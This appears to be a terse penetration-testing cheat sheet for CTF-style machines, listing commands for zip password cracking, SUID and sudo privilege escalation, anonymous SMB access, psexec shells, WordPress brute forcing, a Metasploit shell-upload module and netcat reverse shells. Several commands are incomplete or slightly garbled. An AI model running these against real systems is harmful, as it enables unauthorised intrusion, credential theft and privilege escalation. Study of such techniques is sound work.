1. Crack the Passwd of Zip Package

zip2john backup.zip > passwd.txt
john passwd.txt

2. Find

  1. Find file with suid
find / -perm -u=s 2>/dev/null

If we got it ,we can go to GTFobins to check out whether it is possible for Privilege Escalation

  1. Find file for special group
find / -type f -group bugtracker 2>/dev/null
  1. Find file
# linux
find / -name "user.txt"
# powershell
Get-ChildItem  -Recurse –Filter user.txt

3. smb

If the target machine with port 445 opened, we can check out the file under directory if no auth:

smbclient -N -L ////ip

and then dump file from directory:

smbclient  \\\\\\backup/
get filename

When we got the username and password, to get a shell

python3 psexec.py adminstrator@

4. Upgrade Shell to tty

SHELL=/bin/bash script -q /dev/null
# or
python3 -c "import pty;pty.spawn('/bin/bash')"

5. Sudo

view the special permissions of current role:

sudo -l

When a command can be executed with sudo , we can use this command to open a new bash shell to get root privilege .

For example, ! /bin/bash in Vim.

6. Website

Search for subdirectory

gobuster dir -u -w /usr/share/wordlists/dirb/big.txt


nikto -host -o _28.html


Enumerate accounts and Brute Force the password

wpscan --url --enumerate
wpscan --url -U users.txt -P backupPasswords

use metasploit

use exploit/unix/webapp/wp_admin_shell_upload



nc.exe -a "-e cmd.exe 7777"


nc -lvpn 4444

Dump Cached password